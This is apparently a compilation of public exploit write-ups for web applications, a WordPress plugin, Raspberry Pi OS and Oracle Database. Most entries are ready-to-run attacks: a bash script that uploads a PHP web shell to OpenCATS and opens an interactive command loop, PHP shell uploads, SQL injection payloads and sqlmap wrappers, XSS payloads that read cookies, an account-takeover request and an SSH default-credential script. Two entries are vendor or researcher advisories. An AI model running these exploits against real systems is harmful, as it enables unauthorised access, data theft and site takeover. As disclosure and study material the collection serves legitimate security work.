<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)<br /># Date: 9/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux <br /><br /><br />Home Owners Collection Management System 1.0 is vulnerable to unauthenticated account takeover.<br />The save handler at /hocms/classes/Users.php?f=save accepts the request below without a logged-in session, so an attacker can overwrite any registered 'Staff' user account<br />by setting the "id" parameter to the victim's user id and supplying attacker-chosen "firstname", "lastname", "username", "password" and "type" values.<br /><br />#Steps to Reproduce<br /><br />1. Send the POST request below with "id" set to the target account's id (the captured request leaves it empty) and new "firstname", "lastname", "username", "password" and "type" values.<br /><br />2. Go to http://localhost/hocms/admin/ and log in with the username and password you supplied.<br /><br /><br />==============================================<br /><br />POST /hocms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391<br />Content-Length: 899<br />Origin: http://localhost<br />Connection: close<br />Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju<br /><br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="firstname"<br /><br />hi<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="lastname"<br /><br />test<br 
/>-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="username"<br /><br />saud<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="password"<br /><br />saud<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="type"<br /><br />1<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------8012296389370411172619882391--<br /><br /></code></pre>
<pre><code># Exploit Title: Raspberry Pi 5.10 - Default Credentials<br /># Date: 08/12/2021<br /># Exploit Author: netspooky<br /># Vendor Homepage: https://www.raspberrypi.com/<br /># Software Link: https://www.raspberrypi.com/software/operating-systems/<br /># Version: Raspberry Pi OS <= 5.10<br /># Tested on: Raspberry Pi OS 5.10<br /># CVE : CVE-2021-38759<br /><br /># Initial Release: https://twitter.com/netspooky/status/1468603668266209280<br /><br /># Run: $ python3 exploit.py IP<br /><br />import sys<br />import paramiko<br /><br />if len(sys.argv) != 2:<br />    print("Usage: python3 exploit.py IP")<br />    sys.exit(1)<br /><br />h = sys.argv[1]   # target host<br />u = "pi"          # default Raspberry Pi OS account<br />p = "raspberry"   # its default password<br /><br />c = paramiko.client.SSHClient()<br /># Accept whatever host key the target presents; convenient for a one-off check,<br /># but it also means the script would happily authenticate to a man-in-the-middle.<br />c.set_missing_host_key_policy(paramiko.AutoAddPolicy())<br />c.connect(h, username=u, password=p)<br /><br />i, o, e = c.exec_command("id")<br />print(o.read().decode())   # output of 'id' proves the default credentials still work<br /><br />c.close()<br /></code></pre>
<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection<br /># Date: 9/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /><br /># Vulnerable Code<br /><br />line 68 in file "/hocms/admin/members/view_member.php"<br /><br />$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");<br /><br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member<br /></code></pre>
<pre><code># Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)<br /># Google Dork: intext:"Current Available Openings, Recently Posted Jobs"<br /># Date: 21/09/2021<br /># Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar<br /># Vendor Homepage: https://www.opencats.org/<br /># Software Link: https://github.com/opencats/OpenCATS<br /># Version: <=0.9.4 Countach<br /># Tested on: Debian, CentOS, Windows Server<br /><br />#!/bin/bash<br /><br />if [ $# -eq 0 ]<br />then<br /> echo "Usage: $0 <target URL>"<br /> exit<br />fi<br /><br /><br /><br /># if a payload doesn't work, try another<br /><br />payload='GIF87a<?php echo system($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'<br />#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'<br /><br />target=$1<br /><br />green="\033[0;32m"<br />red="\033[0;31m"<br />reset="\033[0m"<br /><br />#====================== Functions<br /><br />rev() {<br />while true<br /> do echo -n -e "\n$ "<br /> read cmd<br /> curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"<br /> done<br />}<br /><br />upload() {<br /> curl -skL $1/$2 \<br /> -H "Connection: close" \<br /> -F resumeFile=@"$3;type=application/x-php" \<br /> -F ID="$firstJb" \<br /> -F candidateID="-1" \<br /> -F applyToJobSubAction="resumeLoad" \<br /> --compressed \<br /> --insecure<br />}<br /><br />getVersion() {<br /> ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`<br /><br /> if [ -z "${ver}" ]<br /> then<br /> ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`<br /> if [ -z "${ver}" ]<br /> then<br /> echo -e 
"${red}[-] Couldn't identity CATS version, but that's ok...${reset}"<br /> return 0<br /> fi<br /> fi<br /> echo -e "${green}[*] Version detected: $ver${reset}"<br />}<br /><br />writePayload(){<br /><br /> tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"<br /> file=`basename $tmpfile`<br /> echo "$1" > $tmpfile<br />}<br /><br />banner(){<br /> echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d<br /> echo -e "\n"<br />}<br /><br />#======================<br /><br />banner<br /><br />echo "[*] Attacking target $target"<br /><br />echo "[*] Checking CATS version..."<br />getVersion $target<br />#exit<br /><br />echo "[*] Creating temp file with payload..."<br />writePayload "$payload"<br /><br />#exit<br /><br />echo "[*] Checking active jobs..."<br /><br />jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`<br />numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`<br />firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`<br /><br />if [[ ! $numJb -gt 0 ]]<br />then<br /> echo -e "${red}[-] No active jobs found.${reset}"<br /> echo "[*] Trying another path..."<br /> jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`<br /> numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`<br /><br /> if [[ ! $numJb -gt 0 ]]<br /> then<br /> echo -e "${red}[-] Couldn't find any active job.${reset}"<br /> exit<br /> fi<br />fi<br /><br />firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`<br /><br />echo -e "${green}[+] Jobs found! 
Using job id $firstJb${reset}"<br />echo "[*] Sending payload..."<br /><br />req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`<br /><br /># Test grep's exit status directly; command-substituting its (empty) output would leave<br /># 'if' with a null command, so the branch would never depend on the result.<br />if ! echo "$req" | grep -Eq "still be uploaded|will be uploaded|$file"<br />then<br /> echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"<br /> echo "[*] Checking by another method..."<br /><br /> # Retry without the GIF87a prefix, through the alternate careers path<br /> sed -i "s/GIF87a//" $tmpfile<br /><br /> req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`<br /><br /> if ! echo "$req" | grep -Eq "still be uploaded|will be uploaded|$file"<br /> then<br /> echo -e "${red}[-] Couldn't upload payload...${reset}"<br /> exit<br /> fi<br />fi<br /><br />echo -e "${green}[+] Payload $file uploaded!${reset}"<br />echo "[*] Deleting created temp file..."<br />rm $tmpfile<br />echo "[*] Checking shell..."<br />check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")<br />if echo "$check" | grep -q "0x7359"<br />then<br /> echo -e "${green}[+] Got shell! :D${reset}"<br /> curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"<br /> rev $target/upload/careerportaladd/$file<br />else<br /> echo -e "${red}[-] Couldn't get a shell.\n Maybe you should try it manually or use another payload.${reset}"<br />fi<br /><br /></code></pre>
<pre><code>On February 7, 2022, Security Researcher Cyku Hong from DEVCORE reported a vulnerability to us that they discovered in WP Statistics, a WordPress plugin installed on over 600,000 sites. This vulnerability made it possible for unauthenticated attackers to execute arbitrary SQL queries by appending them to an existing SQL query. This could be used to extract sensitive information like password hashes and secret keys from the database. On request, we assigned them the vulnerability identifier: CVE-2022-0513.<br /><br />Even though Wordfence provides protection against this vulnerability, we strongly recommend ensuring that your site has been updated to the latest patched version of “WP Statistics,” which is version 13.1.5 at the time of this publication.<br /><br /><br />Description: Unauthenticated Blind SQL Injection<br />Affected Plugin: WP Statistics<br />Plugin Slug: wp-statistics<br />Plugin Developer: VeronaLabs<br />Affected Versions: <= 13.1.4<br />CVE ID: CVE-2022-0513<br />CVSS Score: 9.8 (Critical)<br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />Researcher/s: Cyku Hong from DEVCORE<br />Fully Patched Version: 13.1.5<br /><br />WP Statistics is a WordPress plugin designed to provide a centralized hub for all of a WordPress site’s statistics, such as visitor data, and it emphasizes storing this data locally to the WordPress site to preserve user privacy. As such, it is reasonable to expect that the plugin would implement a lot of functionality to store and retrieve information from the database through the use of SQL queries. Unfortunately, the implementation of one of these queries was insecure, creating a SQL Injection vulnerability.<br /><br />When the “Record Exclusions” feature was enabled, this vulnerability became exploitable. 
The “Record Exclusions” feature is designed to record when a visit, or a “hit”, is excluded from the site’s statistics, such as visits by users with specific roles, login page access, and anything else that a site owner may have explicitly selected to exclude. It records that data to a separate database table so as not to contaminate the main statistical data the plugin collects.<br /><br />In order to record these hits when a caching plugin was enabled, the plugin registered a REST route /wp-json/wp-statistics/v2/hit that would call the hit_callback() function. This function would then call the record() function from the ‘Hits’ class, which checks whether the request should be excluded and determines which exclusion the request matches, before calling the next appropriate record() function.<br /><br />public static function record()<br />{<br />    # Check Exclusion This Hits<br />    $exclusion = Exclusion::check();<br /><br />    # Record Hits Exclusion<br />    if ($exclusion['exclusion_match'] === true) {<br />        Exclusion::record($exclusion);<br />    }<br /><br />    # Record User Visits<br />    if (Visit::active() and $exclusion['exclusion_match'] === false) {<br />        Visit::record();<br />    }<br /><br />    # Record Visitor Detail<br />    if (Visitor::active()) {<br />        $visitor_id = Visitor::record($exclusion);<br />    }<br /><br />When the exclusion_match parameter is set to true in a request, the data is then passed to the record() function from the ‘Exclusion’ class, where the plugin attempts to update the count of an exclusion reason for the day if it is present in the database. 
If the exclusion reason isn’t present in the database for the current date, the initial query returns false and triggers the next query, which inserts a new record count for the reason.<br /><br />public static function record($exclusion = array())<br />{<br />    global $wpdb;<br /><br />    // If we're not storing exclusions, just return.<br />    if (self::record_active() != true) {<br />        return;<br />    }<br /><br />    // Check Exist this Exclusion in this day<br />    $result = $wpdb->query("UPDATE " . DB::table('exclusions') . " SET `count` = `count` + 1 WHERE `date` = '" . TimeZone::getCurrentDate('Y-m-d') . "' AND `reason` = '{$exclusion['exclusion_reason']}'");<br /><br />    if (!$result) {<br />        $insert = $wpdb->insert(<br />            DB::table('exclusions'),<br />            array(<br />                'date' => TimeZone::getCurrentDate('Y-m-d'),<br />                'reason' => $exclusion['exclusion_reason'],<br />                'count' => 1,<br />            )<br />        );<br /><br />        if (!$insert) {<br />            if (!empty($wpdb->last_error)) {<br />                \WP_Statistics::log($wpdb->last_error);<br />            }<br />        }<br /><br />The $wpdb->query() function was used for the initial UPDATE query and used the user-supplied 'exclusion_reason' value as part of the query. Because that value was neither escaped nor passed through a parameterized query ($wpdb->prepare()), attackers could append additional SQL to the existing query via 'exclusion_reason' and extract sensitive information from the database.<br /><br />Since no data from the SQL query was returned in the response, and the response did not indicate a boolean answer, an attacker would need to use a time-based blind approach to extract information from the database. This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database. 
This is an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities.<br /><br />Upon further analysis, we uncovered that a user could also simply pass the exclusion_match parameter equal to yes, the exclusion_reason parameter set to the SQLi payload, and the wp_statistics_hit_rest parameter set to true, along with passing the string wp-json/ in the request URI to trigger the same record() function from the ‘Exclusions’ class. This method did not require a caching plugin to be enabled to obtain a valid nonce to trigger the REST endpoint. This is due to the is_rest_request() function returning true when the $_SERVER['REQUEST_URI'] contains the REST prefix, wp-json/, even if the request isn’t a genuine REST request. This ultimately triggers the entire record process.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “WP Statistics” plugin that made it possible for unauthenticated attackers to inject arbitrary SQL queries to steal sensitive information from a database. This flaw has been fully patched in version 13.1.5.<br /><br />We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 13.1.5 at the time of this publication.<br /><br />All Wordfence users, including Free are protected from exploits targeting this vulnerability thanks to the Wordfence Firewall’s built-in SQL Injection protection.<br /><br />If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as this is a serious vulnerability that can lead to complete site takeover.<br /><br />Congratulations to Cyku Hong from DEVCORE for discovering and responsibly disclosing this vulnerability to the plugin’s developers. <br /></code></pre>
<pre><code># Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)<br /># Exploit Author: fuzzyap1<br /># Date: 7-12-2021<br /># Category: Web application<br /># Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip<br /># Version: 1.0<br /># Tested on: windows<br /># Vulnerable pages: http://localhost/admin/enquiry_category, http://localhost/admin/manage_profile<br /># Vulnerable Parameters: "category", "name"<br /><br />Technical description:<br />Stored XSS vulnerabilities exist in Free School Management Software 1.0: the<br />"category" field of an enquiry category and the "name" field of the admin<br />profile are stored without sanitisation and rendered back unescaped. An<br />attacker can use them to run JavaScript in the browser of every user who<br />later views the affected page, which can lead to cookie theft, defacement<br />and more. Both forms live under /admin, so the requests below were sent<br />with a logged-in session cookie.<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/admin/enquiry_category<br />2) Insert your payload in the "category" parameter<br />3) Click "save"<br /><br />Proof of concept (Poc):<br />The following payload executes JavaScript when the stored value is rendered -<br />"><img src=# onerror=alert(document.cookie)><br /><br />---<br /><br />POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)<br />Gecko/20100101 Firefox/89.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------151631281127875309002088019539<br />Content-Length: 490<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/admin/enquiry_category<br />Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;<br />ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0<br />Upgrade-Insecure-Requests: 1<br /><br 
/>-----------------------------151631281127875309002088019539<br />Content-Disposition: form-data; name="category"<br /><br />This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)><br />-----------------------------151631281127875309002088019539<br />Content-Disposition: form-data; name="purpose"<br /><br />Payment<br />-----------------------------151631281127875309002088019539<br />Content-Disposition: form-data; name="whom"<br /><br />Tutorial<br />-----------------------------151631281127875309002088019539--<br /><br />---<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/admin/manage_profile<br />2) Insert your payload in the "name" parameter<br />3) Click "save"<br /><br />Proof of concept (Poc):<br />The following payload executes JavaScript when the stored value is rendered -<br />"><img src=# onerror=alert('xss')><br /><br />---<br /><br />POST /admin/manage_profile/update HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)<br />Gecko/20100101 Firefox/89.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------13285163425854907563979323722<br />Content-Length: 519<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/admin/manage_profile<br />Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------13285163425854907563979323722<br />Content-Disposition: form-data; name="name"<br /><br />Administrator"><img src=# onerror=alert(document.cookie)><br />-----------------------------13285163425854907563979323722<br />Content-Disposition: form-data; name="email"<br /><br />admin@admin.com<br />-----------------------------13285163425854907563979323722<br 
/>Content-Disposition: form-data; name="userfile"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------13285163425854907563979323722--<br /><br />---<br /></code></pre>
<pre><code>## Title: Hospital Management Startup v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.10.2022<br />## Vendor: https://github.com/kabirkhyrul<br />## Software: https://github.com/kabirkhyrul/HMS<br />## CVE-2022-23366<br /><br />## Description:<br />The loginid and password parameters of the Hospital Management Startup<br />1.0 login form are vulnerable to time-based blind SQL injection.<br />Because the injection point is the login form itself, no credentials are<br />needed: an attacker can read the administrator account's records out of<br />the database and abuse them.<br />This is exploitable wherever the login page is reachable, whether the<br />application is exposed on an external domain, a subdomain or only on an<br />internal network.<br /><br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: loginid (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND<br />(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND<br />'sDHP'='sDHP&rememberme=on&submit=Login<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/hri9eo)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)<br /># Exploit Author: fuuzap1<br /># Date: 7-12-2021<br /># Category: Web application<br /># Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip<br /># Version: 1.0<br /># Tested on: windows<br /># Vulnerable page: http://localhost/admin/examQuestion<br /><br /><br />Technical description:<br />An unrestricted file upload vulnerability exists in Free School Management<br />Software 1.0. The "ADD NEW QUESTION PAPER" form under /admin/examQuestion<br />accepts any file type, and uploaded files are stored under<br />/uploads/exam_question/ where they are reachable by everyone. A file<br />containing "<?php system($_GET["cmd"]); ?>" is therefore executed by the<br />web server when requested, giving the attacker remote code execution.<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/admin/examQuestion<br />2) Click "ADD NEW QUESTION PAPER" and fill in the basic information<br />3) Upload a PHP webshell containing "<?php system($_GET["cmd"]); ?>" via<br />the "Drag and drop a file here or click" field<br />4) Click "save"<br />5) Open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() to<br />confirm PHP code execution<br /><br />Proof of concept (Poc):<br />The following payload will allow you to run PHP code (the captured request<br />below uploads an eval() variant of the same shell) -<br /><?php system($_GET["cmd"]); ?><br /><br />---<br />POST /admin/examQuestion/create HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)<br />Gecko/20100101 Firefox/89.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br 
/>boundary=---------------------------183813756938980137172117669544<br />Content-Length: 1331<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/admin/examQuestion<br />Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="name"<br /><br />test4<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="class_id"<br /><br />2<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="subject_id"<br /><br />5<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="timestamp"<br /><br />2021-12-08<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="teacher_id"<br /><br />1<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="file_type"<br /><br />txt<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="status"<br /><br />1<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="description"<br /><br />123123<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="_wysihtml5_mode"<br /><br />1<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="file_name"; filename="cmd.php"<br />Content-Type: application/octet-stream<br /><br /><?php eval($_GET["cmd"]); ?><br />-----------------------------183813756938980137172117669544--<br />---<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)<br /># Date 08.02.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://ays-pro.com/<br /># Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip<br /># Version: < 2.8.2<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-24931<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md<br /><br />'''<br />Description:<br />The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the<br />sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated<br />and authenticated users) before using it in a SQL statement, leading to an SQL injection.<br />'''<br /><br />banner = '''<br /><br /> .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-.<br />: .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' :<br />: : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: :<br />: :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : :<br />`.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' 
:_;<br /> <br /> [+] Copy Content Protection and Content Locking - SQL Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br /> <br />'''<br />print(banner)<br />import argparse<br />from datetime import datetime<br />import os<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br /><br /># Exploit:<br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print('[*] Payload for SQL-Injection:')<br />exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" '<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2021-062<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 19c<br />Tested Version(s): 18c<br />Vulnerability Type: Inadequate Encryption Strength (CWE-326)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2021-03-17<br />Solution Date: 2021-08-07<br />Public Disclosure: 2021-12-10<br />CVE Reference: CVE-2021-2351<br />Author of Advisory: Moritz Bechler, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Oracle Database is a general purpose relational database management<br />system (RDBMS).<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"Oracle database products offer customers cost-optimized and high-performance <br />versions of Oracle Database, the world's leading converged, multi-model <br />database management system, as well as in-memory, NoSQL and MySQL databases.<br />Oracle Autonomous Database, available on premises via Oracle Cloud@Customer <br />or in the Oracle Cloud Infrastructure, enables customers to simplify relational <br />database environments and reduce management workloads."<br /><br />To protect the client/server communication, a proprietary security protocol <br />"Native Network Encryption" (NNE) is used. <br />A TLS-based alternative can optionally be configured.<br /><br />NNE's integrity protection mechanism deliberately weakens the key used <br />for computing per-packet message authentication codes (MACs). 
<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />When analyzing the protocol details, SySS found out that depending on<br />the selected hash algorithms, one of two key generation schemes is used.<br />Both are seeded with material from the established session key.<br />However, even for the AES-based key generator, which is used when modern <br />cryptographic primitives are selected, the session key is truncated to<br />40 bits.<br /><br />For more details on the protocol and MAC computation, refer to our<br />paper [4].<br /><br />Brute-force cracking of that key, for example if only integrity but no <br />encryption is enabled, is likely possible and allows malicious<br />manipulation of transmitted database commands or data.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The initialization of the key generator, as originally implemented, can <br />be described with the following Python code, where SK is the established<br />session key, and the initialization vector (IV) was exchanged in<br />clear text during NNE negotiation. 
